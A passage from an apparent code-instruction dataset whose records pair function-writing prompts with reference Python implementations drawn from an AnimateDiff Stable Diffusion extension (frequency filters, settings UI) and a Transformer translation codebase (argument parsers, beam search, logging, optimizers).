sqrt_one_minus_alpha_prod = sqrt_one_minus_alpha_prod.unsqueeze(-1)
noisy_samples = sqrt_alpha_prod * original_samples + sqrt_one_minus_alpha_prod * noise
return noisy_samples | null |
3,824 | import torch
import torch.fft as fft
import math
import os
import re
import sys
from modules import sd_models, shared, sd_samplers, devices
from modules.paths import extensions_builtin_dir
from modules.processing import StableDiffusionProcessing, opt_C, opt_f, StableDiffusionProcessingTxt2Img, StableDiffusionProcessingImg2Img, decode_latent_batch
from types import MethodType
from scripts.animatediff_logger import logger_animatediff as logger
from scripts.animatediff_ui import AnimateDiffProcess
The provided code snippet includes necessary dependencies for implementing the `freq_mix_3d` function. Write a Python function `def freq_mix_3d(x, noise, LPF)` to solve the following problem:
Noise reinitialization. Args: x: diffused latent noise: randomly sampled noise LPF: low pass filter
Here is the function:
def freq_mix_3d(x, noise, LPF):
"""
Noise reinitialization.
Args:
x: diffused latent
noise: randomly sampled noise
LPF: low pass filter
"""
# FFT
x_freq = fft.fftn(x, dim=(-3, -2, -1))
x_freq = fft.fftshift(x_freq, dim=(-3, -2, -1))
noise_freq = fft.fftn(noise, dim=(-3, -2, -1))
noise_freq = fft.fftshift(noise_freq, dim=(-3, -2, -1))
# frequency mix
HPF = 1 - LPF
x_freq_low = x_freq * LPF
noise_freq_high = noise_freq * HPF
x_freq_mixed = x_freq_low + noise_freq_high # mix in freq domain
# IFFT
x_freq_mixed = fft.ifftshift(x_freq_mixed, dim=(-3, -2, -1))
x_mixed = fft.ifftn(x_freq_mixed, dim=(-3, -2, -1)).real
return x_mixed | Noise reinitialization. Args: x: diffused latent noise: randomly sampled noise LPF: low pass filter |
3,825 | import torch
import torch.fft as fft
import math
import os
import re
import sys
from modules import sd_models, shared, sd_samplers, devices
from modules.paths import extensions_builtin_dir
from modules.processing import StableDiffusionProcessing, opt_C, opt_f, StableDiffusionProcessingTxt2Img, StableDiffusionProcessingImg2Img, decode_latent_batch
from types import MethodType
from scripts.animatediff_logger import logger_animatediff as logger
from scripts.animatediff_ui import AnimateDiffProcess
def gaussian_low_pass_filter(shape, d_s=0.25, d_t=0.25):
"""
Compute the gaussian low pass filter mask.
Args:
shape: shape of the filter (volume)
d_s: normalized stop frequency for spatial dimensions (0.0-1.0)
d_t: normalized stop frequency for temporal dimension (0.0-1.0)
"""
T, H, W = shape[-3], shape[-2], shape[-1]
mask = torch.zeros(shape)
if d_s==0 or d_t==0:
return mask
for t in range(T):
for h in range(H):
for w in range(W):
d_square = (((d_s/d_t)*(2*t/T-1))**2 + (2*h/H-1)**2 + (2*w/W-1)**2)
mask[..., t,h,w] = math.exp(-1/(2*d_s**2) * d_square)
return mask
def butterworth_low_pass_filter(shape, n=4, d_s=0.25, d_t=0.25):
"""
Compute the butterworth low pass filter mask.
Args:
shape: shape of the filter (volume)
n: order of the filter, larger n ~ ideal, smaller n ~ gaussian
d_s: normalized stop frequency for spatial dimensions (0.0-1.0)
d_t: normalized stop frequency for temporal dimension (0.0-1.0)
"""
T, H, W = shape[-3], shape[-2], shape[-1]
mask = torch.zeros(shape)
if d_s==0 or d_t==0:
return mask
for t in range(T):
for h in range(H):
for w in range(W):
d_square = (((d_s/d_t)*(2*t/T-1))**2 + (2*h/H-1)**2 + (2*w/W-1)**2)
mask[..., t,h,w] = 1 / (1 + (d_square / d_s**2)**n)
return mask
def ideal_low_pass_filter(shape, d_s=0.25, d_t=0.25):
"""
Compute the ideal low pass filter mask.
Args:
shape: shape of the filter (volume)
d_s: normalized stop frequency for spatial dimensions (0.0-1.0)
d_t: normalized stop frequency for temporal dimension (0.0-1.0)
"""
T, H, W = shape[-3], shape[-2], shape[-1]
mask = torch.zeros(shape)
if d_s==0 or d_t==0:
return mask
for t in range(T):
for h in range(H):
for w in range(W):
d_square = (((d_s/d_t)*(2*t/T-1))**2 + (2*h/H-1)**2 + (2*w/W-1)**2)
mask[..., t,h,w] = 1 if d_square <= d_s*2 else 0
return mask
def box_low_pass_filter(shape, d_s=0.25, d_t=0.25):
"""
Compute the ideal low pass filter mask (approximated version).
Args:
shape: shape of the filter (volume)
d_s: normalized stop frequency for spatial dimensions (0.0-1.0)
d_t: normalized stop frequency for temporal dimension (0.0-1.0)
"""
T, H, W = shape[-3], shape[-2], shape[-1]
mask = torch.zeros(shape)
if d_s==0 or d_t==0:
return mask
threshold_s = round(int(H // 2) * d_s)
threshold_t = round(T // 2 * d_t)
cframe, crow, ccol = T // 2, H // 2, W //2
mask[..., cframe - threshold_t:cframe + threshold_t, crow - threshold_s:crow + threshold_s, ccol - threshold_s:ccol + threshold_s] = 1.0
return mask
The provided code snippet includes necessary dependencies for implementing the `get_freq_filter` function. Write a Python function `def get_freq_filter(shape, device, params: dict)` to solve the following problem:
Form the frequency filter for noise reinitialization. Args: shape: shape of latent (B, C, T, H, W) params: filter parameters
Here is the function:
def get_freq_filter(shape, device, params: dict):
"""
Form the frequency filter for noise reinitialization.
Args:
shape: shape of latent (B, C, T, H, W)
params: filter parameters
"""
if params['method'] == "gaussian":
return gaussian_low_pass_filter(shape=shape, d_s=params['d_s'], d_t=params['d_t']).to(device)
elif params['method'] == "ideal":
return ideal_low_pass_filter(shape=shape, d_s=params['d_s'], d_t=params['d_t']).to(device)
elif params['method'] == "box":
return box_low_pass_filter(shape=shape, d_s=params['d_s'], d_t=params['d_t']).to(device)
elif params['method'] == "butterworth":
return butterworth_low_pass_filter(shape=shape, n=4, d_s=params['d_s'], d_t=params['d_t']).to(device)
else:
raise NotImplementedError | Form the frequency filter for noise reinitialization. Args: shape: shape of latent (B, C, T, H, W) params: filter parameters |
3,826 | import gradio as gr
from modules import shared
from scripts.animatediff_ui import supported_save_formats
supported_save_formats = ["GIF", "MP4", "WEBP", "WEBM", "PNG", "TXT"]
def on_ui_settings():
section = ("animatediff", "AnimateDiff")
s3_selection =("animatediff", "AnimateDiff AWS")
shared.opts.add_option(
"animatediff_model_path",
shared.OptionInfo(
None,
"Path to save AnimateDiff motion modules",
gr.Textbox,
{"placeholder": "Leave empty to use default path: extensions/sd-webui-animatediff/model"},
section=section,
),
)
shared.opts.add_option(
"animatediff_default_save_formats",
shared.OptionInfo(
["GIF", "PNG"],
"Default Save Formats",
gr.CheckboxGroup,
{"choices": supported_save_formats},
section=section
).needs_restart()
)
shared.opts.add_option(
"animatediff_frame_extract_path",
shared.OptionInfo(
None,
"Path to save extracted frames",
gr.Textbox,
{"placeholder": "Leave empty to use default path: tmp/animatediff-frames"},
section=section
)
)
shared.opts.add_option(
"animatediff_frame_extract_remove",
shared.OptionInfo(
False,
"Always remove extracted frames after processing",
gr.Checkbox,
section=section
)
)
shared.opts.add_option(
"animatediff_save_to_custom",
shared.OptionInfo(
True,
"Save frames to stable-diffusion-webui/outputs/{ txt|img }2img-images/AnimateDiff/{gif filename}/{date} "
"instead of stable-diffusion-webui/outputs/{ txt|img }2img-images/{date}/.",
gr.Checkbox,
section=section
)
)
# traditional video optimization specification
shared.opts.add_option(
"animatediff_optimize_gif_palette",
shared.OptionInfo(
False,
"Calculate the optimal GIF palette, improves quality significantly, removes banding",
gr.Checkbox,
section=section
)
)
shared.opts.add_option(
"animatediff_optimize_gif_gifsicle",
shared.OptionInfo(
False,
"Optimize GIFs with gifsicle, reduces file size",
gr.Checkbox,
section=section
)
)
shared.opts.add_option(
key="animatediff_mp4_crf",
info=shared.OptionInfo(
default=23,
label="MP4 Quality (CRF)",
component=gr.Slider,
component_args={
"minimum": 0,
"maximum": 51,
"step": 1},
section=section
)
.link("docs", "https://trac.ffmpeg.org/wiki/Encode/H.264#crf")
.info("17 for best quality, up to 28 for smaller size")
)
shared.opts.add_option(
key="animatediff_mp4_preset",
info=shared.OptionInfo(
default="",
label="MP4 Encoding Preset",
component=gr.Dropdown,
component_args={"choices": ["", 'veryslow', 'slower', 'slow', 'medium', 'fast', 'faster', 'veryfast', 'superfast', 'ultrafast']},
section=section,
)
.link("docs", "https://trac.ffmpeg.org/wiki/Encode/H.264#Preset")
.info("encoding speed, use the slowest you can tolerate")
)
shared.opts.add_option(
key="animatediff_mp4_tune",
info=shared.OptionInfo(
default="",
label="MP4 Tune encoding for content type",
component=gr.Dropdown,
component_args={"choices": ["", "film", "animation", "grain"]},
section=section
)
.link("docs", "https://trac.ffmpeg.org/wiki/Encode/H.264#Tune")
.info("optimize for specific content types")
)
shared.opts.add_option(
"animatediff_webp_quality",
shared.OptionInfo(
80,
"WebP Quality (if lossless=True, increases compression and CPU usage)",
gr.Slider,
{
"minimum": 1,
"maximum": 100,
"step": 1},
section=section
)
)
shared.opts.add_option(
"animatediff_webp_lossless",
shared.OptionInfo(
False,
"Save WebP in lossless format (highest quality, largest file size)",
gr.Checkbox,
section=section
)
)
# s3 storage specification, most likely for some startup
shared.opts.add_option(
"animatediff_s3_enable",
shared.OptionInfo(
False,
"Enable to Store file in object storage that supports the s3 protocol",
gr.Checkbox,
section=s3_selection
)
)
shared.opts.add_option(
"animatediff_s3_host",
shared.OptionInfo(
None,
"S3 protocol host",
gr.Textbox,
section=s3_selection,
),
)
shared.opts.add_option(
"animatediff_s3_port",
shared.OptionInfo(
None,
"S3 protocol port",
gr.Textbox,
section=s3_selection,
),
)
shared.opts.add_option(
"animatediff_s3_access_key",
shared.OptionInfo(
None,
"S3 protocol access_key",
gr.Textbox,
section=s3_selection,
),
)
shared.opts.add_option(
"animatediff_s3_secret_key",
shared.OptionInfo(
None,
"S3 protocol secret_key",
gr.Textbox,
section=s3_selection,
),
)
shared.opts.add_option(
"animatediff_s3_storge_bucket",
shared.OptionInfo(
None,
"Bucket for file storage",
gr.Textbox,
section=s3_selection,
),
) | null |
3,827 | import json
import argparse
import torch
import numpy as np
from torch import nn
from src.slurm import init_signal_handler, init_distributed_mode
from src.data.loader import check_data_params, load_data
from src.utils import bool_flag, initialize_exp, set_sampling_probs, shuf_order
from src.model import check_model_params, build_model
from src.trainer import SingleTrainer, EncDecTrainer
from src.evaluation.evaluator import SingleEvaluator, EncDecEvaluator
import apex
from src.fp16 import network_to_half
def bool_flag(s):
"""
Parse boolean arguments from the command line.
"""
if s.lower() in FALSY_STRINGS:
return False
elif s.lower() in TRUTHY_STRINGS:
return True
else:
raise argparse.ArgumentTypeError("Invalid value for a boolean flag!")
The provided code snippet includes necessary dependencies for implementing the `get_parser` function. Write a Python function `def get_parser()` to solve the following problem:
Generate a parameters parser.
Here is the function:
def get_parser():
"""
Generate a parameters parser.
"""
# parse parameters
parser = argparse.ArgumentParser(description="Language transfer")
# main parameters
parser.add_argument("--dump_path", type=str, default="./dumped/",
help="Experiment dump path")
parser.add_argument("--exp_name", type=str, default="",
help="Experiment name")
parser.add_argument("--save_periodic", type=int, default=0,
help="Save the model periodically (0 to disable)")
parser.add_argument("--exp_id", type=str, default="",
help="Experiment ID")
# float16
parser.add_argument("--fp16", type=bool_flag, default=False,
help="Run model with float16")
# only use an encoder (use a specific decoder for machine translation)
parser.add_argument("--encoder_only", type=bool_flag, default=True,
help="Only use an encoder")
parser.add_argument("--english_only", type=bool_flag, default=False,
help="Only use english domain (equal to only use one language)")
# model parameters
parser.add_argument("--emb_dim", type=int, default=512,
help="Embedding layer size")
parser.add_argument("--n_layers", type=int, default=4,
help="Number of Transformer layers")
parser.add_argument("--n_dec_layers", type=int, default=6,
help="Number of Decoder Transformer layers")
parser.add_argument("--n_heads", type=int, default=8,
help="Number of Transformer heads")
parser.add_argument("--dropout", type=float, default=0,
help="Dropout")
parser.add_argument("--attention_dropout", type=float, default=0,
help="Dropout in the attention layer")
parser.add_argument("--gelu_activation", type=bool_flag, default=False,
help="Use a GELU activation instead of ReLU")
parser.add_argument("--share_inout_emb", type=bool_flag, default=True,
help="Share input and output embeddings")
parser.add_argument("--sinusoidal_embeddings", type=bool_flag, default=False,
help="Use sinusoidal embeddings")
parser.add_argument("--attention_setting", type=str, default="v1", choices=["v1", "v2"],
help="Setting for attention module, benefits for distinguish language")
# adaptive softmax
parser.add_argument("--asm", type=bool_flag, default=False,
help="Use adaptive softmax")
if parser.parse_known_args()[0].asm:
parser.add_argument("--asm_cutoffs", type=str, default="8000,20000",
help="Adaptive softmax cutoffs")
parser.add_argument("--asm_div_value", type=float, default=4,
help="Adaptive softmax cluster sizes ratio")
# causal language modeling task parameters
parser.add_argument("--context_size", type=int, default=0,
help="Context size (0 means that the first elements in sequences won't have any context)")
# masked language modeling task parameters
parser.add_argument("--word_pred", type=float, default=0.15,
help="Fraction of words for which we need to make a prediction")
parser.add_argument("--sample_alpha", type=float, default=0,
help="Exponent for transforming word counts to probabilities (~word2vec sampling)")
parser.add_argument("--word_mask_keep_rand", type=str, default="0.8,0.1,0.1",
help="Fraction of words to mask out / keep / randomize, among the words to predict")
# input sentence noise
parser.add_argument("--word_shuffle", type=float, default=0,
help="Randomly shuffle input words (0 to disable)")
parser.add_argument("--word_dropout", type=float, default=0,
help="Randomly dropout input words (0 to disable)")
parser.add_argument("--word_blank", type=float, default=0,
help="Randomly blank input words (0 to disable)")
parser.add_argument("--word_mass", type=float, default=0,
help="Randomly mask input words (0 to disable)")
# data
parser.add_argument("--data_path", type=str, default="",
help="Data path")
parser.add_argument("--lgs", type=str, default="",
help="Languages (lg1-lg2-lg3 .. ex: en-fr-es-de)")
parser.add_argument("--max_vocab", type=int, default=-1,
help="Maximum vocabulary size (-1 to disable)")
parser.add_argument("--min_count", type=int, default=0,
help="Minimum vocabulary count")
parser.add_argument("--lg_sampling_factor", type=float, default=-1,
help="Language sampling factor")
# batch parameters
parser.add_argument("--bptt", type=int, default=256,
help="Sequence length")
parser.add_argument("--min_len", type=int, default=0,
help="Minimum length of sentences (after BPE)")
parser.add_argument("--max_len", type=int, default=100,
help="Maximum length of sentences (after BPE)")
parser.add_argument("--group_by_size", type=bool_flag, default=True,
help="Sort sentences by size during the training")
parser.add_argument("--batch_size", type=int, default=32,
help="Number of sentences per batch")
parser.add_argument("--max_batch_size", type=int, default=0,
help="Maximum number of sentences per batch (used in combination with tokens_per_batch, 0 to disable)")
parser.add_argument("--tokens_per_batch", type=int, default=-1,
help="Number of tokens per batch")
# training parameters
parser.add_argument("--split_data", type=bool_flag, default=False,
help="Split data across workers of a same node")
parser.add_argument("--optimizer", type=str, default="adam,lr=0.0001",
help="Optimizer (SGD / RMSprop / Adam, etc.)")
parser.add_argument("--clip_grad_norm", type=float, default=5,
help="Clip gradients norm (0 to disable)")
parser.add_argument("--epoch_size", type=int, default=100000,
help="Epoch size / evaluation frequency (-1 for parallel data size)")
parser.add_argument("--max_epoch", type=int, default=100000,
help="Maximum epoch size")
parser.add_argument("--stopping_criterion", type=str, default="",
help="Stopping criterion, and number of non-increase before stopping the experiment")
parser.add_argument("--validation_metrics", type=str, default="",
help="Validation metrics")
# training coefficients
parser.add_argument("--lambda_mlm", type=str, default="1",
help="Prediction coefficient (MLM)")
parser.add_argument("--lambda_clm", type=str, default="1",
help="Causal coefficient (LM)")
parser.add_argument("--lambda_bmt", type=str, default="1",
help="Back Parallel coefficient")
parser.add_argument("--lambda_pc", type=str, default="1",
help="PC coefficient")
parser.add_argument("--lambda_ae", type=str, default="1",
help="AE coefficient")
parser.add_argument("--lambda_mt", type=str, default="1",
help="MT coefficient")
parser.add_argument("--lambda_bt", type=str, default="1",
help="BT coefficient")
parser.add_argument("--lambda_mass", type=str, default="1",
help="MASS coefficient")
parser.add_argument("--lambda_span", type=str, default="10000",
help="Span coefficient")
# training steps
parser.add_argument("--clm_steps", type=str, default="",
help="Causal prediction steps (CLM)")
parser.add_argument("--mlm_steps", type=str, default="",
help="Masked prediction steps (MLM / TLM)")
parser.add_argument("--bmt_steps", type=str, default="",
help="Back Machine Translation step")
parser.add_argument("--mass_steps", type=str, default="",
help="MASS prediction steps")
parser.add_argument("--mt_steps", type=str, default="",
help="Machine translation steps")
parser.add_argument("--ae_steps", type=str, default="",
help="Denoising auto-encoder steps")
parser.add_argument("--bt_steps", type=str, default="",
help="Back-translation steps")
parser.add_argument("--pc_steps", type=str, default="",
help="Parallel classification steps")
# reload a pretrained model
parser.add_argument("--reload_model", type=str, default="",
help="Reload a pretrained model")
# beam search (for MT only)
parser.add_argument("--beam_size", type=int, default=1,
help="Beam size, default = 1 (greedy decoding)")
parser.add_argument("--length_penalty", type=float, default=1,
help="Length penalty, values < 1.0 favor shorter sentences, while values > 1.0 favor longer ones.")
parser.add_argument("--early_stopping", type=bool_flag, default=False,
help="Early stopping, stop as soon as we have `beam_size` hypotheses, although longer ones may have better scores.")
# evaluation
parser.add_argument("--eval_bleu", type=bool_flag, default=False,
help="Evaluate BLEU score during MT training")
parser.add_argument("--eval_only", type=bool_flag, default=False,
help="Only run evaluations")
# debug
parser.add_argument("--debug_train", type=bool_flag, default=False,
help="Use valid sets for train sets (faster loading)")
parser.add_argument("--debug_slurm", type=bool_flag, default=False,
help="Debug multi-GPU / multi-node within a SLURM job")
# multi-gpu / multi-node
parser.add_argument("--local_rank", type=int, default=-1,
help="Multi-GPU - Local rank")
parser.add_argument("--master_port", type=int, default=-1,
help="Master port (for multi-node SLURM jobs)")
return parser | Generate a parameters parser. |
3,828 | import os
import io
import sys
import argparse
import torch
import math
import torch.nn as nn
import torch.nn.functional as F
from collections import OrderedDict
from src.utils import AttrDict
from src.utils import bool_flag, initialize_exp
from src.data.dictionary import Dictionary
from src.model.transformer import TransformerModel
from src.model.transformer import BeamHypotheses
from src.fp16 import network_to_half
def bool_flag(s):
"""
Parse boolean arguments from the command line.
"""
if s.lower() in FALSY_STRINGS:
return False
elif s.lower() in TRUTHY_STRINGS:
return True
else:
raise argparse.ArgumentTypeError("Invalid value for a boolean flag!")
The provided code snippet includes necessary dependencies for implementing the `get_parser` function. Write a Python function `def get_parser()` to solve the following problem:
Generate a parameters parser.
Here is the function:
def get_parser():
"""
Generate a parameters parser.
"""
# parse parameters
parser = argparse.ArgumentParser(description="Translate sentences")
# main parameters
parser.add_argument("--dump_path", type=str, default="./dumped/", help="Experiment dump path")
parser.add_argument("--exp_name", type=str, default="", help="Experiment name")
parser.add_argument("--exp_id", type=str, default="", help="Experiment ID")
parser.add_argument("--fp16", type=bool_flag, default=False, help="Run model with float16")
parser.add_argument("--batch_size", type=int, default=32, help="Number of sentences per batch")
# model / output paths
parser.add_argument("--model_path", type=str, default="", help="Model path")
parser.add_argument("--output_path", type=str, default="", help="Output path")
parser.add_argument("--beam", type=int, default=1, help="Beam size")
parser.add_argument("--length_penalty", type=float, default=1, help="length penalty")
# source language / target language
parser.add_argument("--src_lang", type=str, default="", help="Source language")
parser.add_argument("--tgt_lang", type=str, default="", help="Target language")
return parser | Generate a parameters parser. |
3,829 | import os
import io
import sys
import argparse
import torch
import math
import torch.nn as nn
import torch.nn.functional as F
from collections import OrderedDict
from src.utils import AttrDict
from src.utils import bool_flag, initialize_exp
from src.data.dictionary import Dictionary
from src.model.transformer import TransformerModel
from src.model.transformer import BeamHypotheses
from src.fp16 import network_to_half
class BeamHypotheses(object):
def __init__(self, n_hyp, max_len, length_penalty, early_stopping):
"""
Initialize n-best list of hypotheses.
"""
self.max_len = max_len - 1 # ignoring <BOS>
self.length_penalty = length_penalty
self.early_stopping = early_stopping
self.n_hyp = n_hyp
self.hyp = []
self.worst_score = 1e9
def __len__(self):
"""
Number of hypotheses in the list.
"""
return len(self.hyp)
def add(self, hyp, sum_logprobs):
"""
Add a new hypothesis to the list.
"""
score = sum_logprobs / len(hyp) ** self.length_penalty
if len(self) < self.n_hyp or score > self.worst_score:
self.hyp.append((score, hyp))
if len(self) > self.n_hyp:
sorted_scores = sorted([(s, idx) for idx, (s, _) in enumerate(self.hyp)])
del self.hyp[sorted_scores[0][1]]
self.worst_score = sorted_scores[1][0]
else:
self.worst_score = min(score, self.worst_score)
def is_done(self, best_sum_logprobs):
"""
If there are enough hypotheses and that none of the hypotheses being generated
can become better than the worst one in the heap, then we are done with this sentence.
"""
if len(self) < self.n_hyp:
return False
elif self.early_stopping:
return True
else:
return self.worst_score >= best_sum_logprobs / self.max_len ** self.length_penalty
def generate_beam(decoders, src_encodeds, src_len, tgt_lang_id, beam_size, length_penalty, early_stopping, max_len=200, params=None):
assert params is not None
src_encs = []
bs = len(src_len)
n_words = params.n_words
src_len = src_len.unsqueeze(1).expand(bs, beam_size).contiguous().view(-1)
for i in range(len(src_encodeds)):
src_encodeds[i] = src_encodeds[i].unsqueeze(1).expand((bs, beam_size) + src_encodeds[i].shape[1:]).contiguous().view((bs * beam_size,) + src_encodeds[i].shape[1:])
generated = src_len.new(max_len, bs * beam_size)
generated.fill_(params.pad_index)
generated[0].fill_(params.eos_index)
generated_hyps = [BeamHypotheses(beam_size, max_len, length_penalty, early_stopping) for _ in range(bs)]
positions = src_len.new(max_len).long()
positions = torch.arange(max_len, out=positions).unsqueeze(1).expand_as(generated)
langs = positions.clone().fill_(tgt_lang_id)
beam_scores = src_encodeds[0].new(bs, beam_size).fill_(0)
beam_scores[:, 1:] = -1e9
beam_scores = beam_scores.view(-1)
cur_len = 1
caches = [{'slen': 0} for i in range(len(decoders))]
done = [False for _ in range(bs)]
while cur_len < max_len:
avg_scores = []
#avg_scores = None
for i, (src_enc, decoder) in enumerate(zip(src_encodeds, decoders)):
tensor = decoder.forward(
'fwd',
x=generated[:cur_len],
lengths=src_len.new(bs * beam_size).fill_(cur_len),
positions=positions[:cur_len],
langs=langs[:cur_len],
causal=True,
src_enc=src_enc,
src_len=src_len,
cache=caches[i]
)
assert tensor.size() == (1, bs * beam_size, decoder.dim)
tensor = tensor.data[-1, :, :] # (bs * beam_size, dim)
scores = decoder.pred_layer.get_scores(tensor) # (bs * beam_size, n_words)
scores = F.log_softmax(scores, dim=-1) # (bs * beam_size, n_words)
avg_scores.append(scores)
avg_scores = torch.logsumexp(torch.stack(avg_scores, dim=0), dim=0) - math.log(len(decoders))
#avg_scores.div_(len(decoders))
_scores = avg_scores + beam_scores[:, None].expand_as(avg_scores)
_scores = _scores.view(bs, beam_size * n_words)
next_scores, next_words = torch.topk(_scores, 2 * beam_size, dim=1, largest=True, sorted=True)
assert next_scores.size() == next_words.size() == (bs, 2 * beam_size)
next_batch_beam = []
for sent_id in range(bs):
# if we are done with this sentence
done[sent_id] = done[sent_id] or generated_hyps[sent_id].is_done(next_scores[sent_id].max().item())
if done[sent_id]:
next_batch_beam.extend([(0, params.pad_index, 0)] * beam_size) # pad the batch
continue
# next sentence beam content
next_sent_beam = []
# next words for this sentence
for idx, value in zip(next_words[sent_id], next_scores[sent_id]):
# get beam and word IDs
beam_id = idx // n_words
word_id = idx % n_words
# end of sentence, or next word
if word_id == params.eos_index or cur_len + 1 == max_len:
generated_hyps[sent_id].add(generated[:cur_len, sent_id * beam_size + beam_id].clone(), value.item())
else:
next_sent_beam.append((value, word_id, sent_id * beam_size + beam_id))
# the beam for next step is full
if len(next_sent_beam) == beam_size:
break
# update next beam content
assert len(next_sent_beam) == 0 if cur_len + 1 == max_len else beam_size
if len(next_sent_beam) == 0:
next_sent_beam = [(0, params.pad_index, 0)] * beam_size # pad the batch
next_batch_beam.extend(next_sent_beam)
assert len(next_batch_beam) == beam_size * (sent_id + 1)
# sanity check / prepare next batch
assert len(next_batch_beam) == bs * beam_size
beam_scores = beam_scores.new([x[0] for x in next_batch_beam])
beam_words = generated.new([x[1] for x in next_batch_beam])
beam_idx = src_len.new([x[2] for x in next_batch_beam])
# re-order batch and internal states
generated = generated[:, beam_idx]
generated[cur_len] = beam_words
for cache in caches:
for k in cache.keys():
if k != 'slen':
cache[k] = (cache[k][0][beam_idx], cache[k][1][beam_idx])
# update current length
cur_len = cur_len + 1
# stop when we are done with each sentence
if all(done):
break
tgt_len = src_len.new(bs)
best = []
for i, hypotheses in enumerate(generated_hyps):
best_hyp = max(hypotheses.hyp, key=lambda x: x[0])[1]
tgt_len[i] = len(best_hyp) + 1 # +1 for the <EOS> symbol
best.append(best_hyp)
# generate target batch
decoded = src_len.new(tgt_len.max().item(), bs).fill_(params.pad_index)
for i, hypo in enumerate(best):
decoded[:tgt_len[i] - 1, i] = hypo
decoded[tgt_len[i] - 1, i] = params.eos_index
# sanity check
assert (decoded == params.eos_index).sum() == 2 * bs
return decoded, tgt_len | null |
3,830 | import torch
def BN_convert_float(module):
'''
Designed to work with network_to_half.
BatchNorm layers need parameters in single precision.
Find all layers and convert them back to float. This can't
be done with built in .apply as that function will apply
fn to all modules, parameters, and buffers. Thus we wouldn't
be able to guard the float conversion based on the module type.
'''
if isinstance(module, torch.nn.modules.batchnorm._BatchNorm):
module.float()
for child in module.children():
BN_convert_float(child)
return module
The provided code snippet includes necessary dependencies for implementing the `network_to_half` function. Write a Python function `def network_to_half(network)` to solve the following problem:
Convert model to half precision in a batchnorm-safe way.
Here is the function:
def network_to_half(network):
"""
Convert model to half precision in a batchnorm-safe way.
"""
return BN_convert_float(network.half()) | Convert model to half precision in a batchnorm-safe way. |
3,831 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
def get_dump_path(params):
"""
Create a directory to store the experiment.
"""
dump_path = DUMP_PATH if params.dump_path == '' else params.dump_path
assert len(params.exp_name) > 0
# create the sweep path if it does not exist
sweep_path = os.path.join(dump_path, params.exp_name)
if not os.path.exists(sweep_path):
subprocess.Popen("mkdir -p %s" % sweep_path, shell=True).wait()
# create an ID for the job if it is not given in the parameters.
# if we run on the cluster, the job ID is the one of Chronos.
# otherwise, it is randomly generated
if params.exp_id == '':
chronos_job_id = os.environ.get('CHRONOS_JOB_ID')
slurm_job_id = os.environ.get('SLURM_JOB_ID')
assert chronos_job_id is None or slurm_job_id is None
exp_id = chronos_job_id if chronos_job_id is not None else slurm_job_id
if exp_id is None:
chars = 'abcdefghijklmnopqrstuvwxyz0123456789'
while True:
exp_id = ''.join(random.choice(chars) for _ in range(10))
if not os.path.isdir(os.path.join(sweep_path, exp_id)):
break
else:
assert exp_id.isdigit()
params.exp_id = exp_id
# create the dump folder / update parameters
params.dump_path = os.path.join(sweep_path, params.exp_id)
if not os.path.isdir(params.dump_path):
subprocess.Popen("mkdir -p %s" % params.dump_path, shell=True).wait()
def create_logger(filepath, rank):
"""
Create a logger.
Use a different log file for each process.
"""
# create log formatter
log_formatter = LogFormatter()
# create file handler and set level to debug
if filepath is not None:
if rank > 0:
filepath = '%s-%i' % (filepath, rank)
file_handler = logging.FileHandler(filepath, "a")
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(log_formatter)
# create console handler and set level to info
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.INFO)
console_handler.setFormatter(log_formatter)
# create logger and set level to debug
logger = logging.getLogger()
logger.handlers = []
logger.setLevel(logging.DEBUG)
logger.propagate = False
if filepath is not None:
logger.addHandler(file_handler)
logger.addHandler(console_handler)
# reset logger elapsed time
def reset_time():
log_formatter.start_time = time.time()
logger.reset_time = reset_time
return logger
The provided code snippet includes necessary dependencies for implementing the `initialize_exp` function. Write a Python function `def initialize_exp(params)` to solve the following problem:
Initialize the experience: - dump parameters - create a logger
Here is the function:
def initialize_exp(params):
"""
Initialize the experience:
- dump parameters
- create a logger
"""
# dump parameters
get_dump_path(params)
pickle.dump(params, open(os.path.join(params.dump_path, 'params.pkl'), 'wb'))
# get running command
command = ["python", sys.argv[0]]
for x in sys.argv[1:]:
if x.startswith('--'):
assert '"' not in x and "'" not in x
command.append(x)
else:
assert "'" not in x
if re.match('^[a-zA-Z0-9_]+$', x):
command.append("%s" % x)
else:
command.append("'%s'" % x)
command = ' '.join(command)
params.command = command + ' --exp_id "%s"' % params.exp_id
# check experiment name
assert len(params.exp_name.strip()) > 0
# create a logger
logger = create_logger(os.path.join(params.dump_path, 'train.log'), rank=getattr(params, 'global_rank', 0))
logger.info("============ Initialized logger ============")
logger.info("\n".join("%s: %s" % (k, str(v))
for k, v in sorted(dict(vars(params)).items())))
logger.info("The experiment will be stored in %s\n" % params.dump_path)
logger.info("Running command: %s" % command)
logger.info("")
return logger | Initialize the experience: - dump parameters - create a logger |
3,832 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
class AdamInverseSqrtWithWarmup(optim.Adam):
"""
Decay the LR based on the inverse square root of the update number.
We also support a warmup phase where we linearly increase the learning rate
from some initial learning rate (`warmup-init-lr`) until the configured
learning rate (`lr`). Thereafter we decay proportional to the number of
updates, with a decay factor set to align with the configured learning rate.
During warmup:
lrs = torch.linspace(warmup_init_lr, lr, warmup_updates)
lr = lrs[update_num]
After warmup:
lr = decay_factor / sqrt(update_num)
where
decay_factor = lr * sqrt(warmup_updates)
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,
weight_decay=0, warmup_updates=4000, warmup_init_lr=1e-7):
super().__init__(
params,
lr=warmup_init_lr,
betas=betas,
eps=eps,
weight_decay=weight_decay,
)
self.warmup_updates = warmup_updates
self.warmup_init_lr = warmup_init_lr
# linearly warmup for the first warmup_updates
warmup_end_lr = lr
self.lr_step = (warmup_end_lr - warmup_init_lr) / warmup_updates
# then, decay prop. to the inverse square root of the update number
self.decay_factor = warmup_end_lr * warmup_updates ** 0.5
for param_group in self.param_groups:
param_group['num_updates'] = 0
def get_lr_for_step(self, num_updates):
# update learning rate
if num_updates < self.warmup_updates:
return self.warmup_init_lr + num_updates * self.lr_step
else:
return self.decay_factor * (num_updates ** -0.5)
def step(self, closure=None):
super().step(closure)
for param_group in self.param_groups:
param_group['num_updates'] += 1
param_group['lr'] = self.get_lr_for_step(param_group['num_updates'])
The provided code snippet includes necessary dependencies for implementing the `get_optimizer` function. Write a Python function `def get_optimizer(parameters, s)` to solve the following problem:
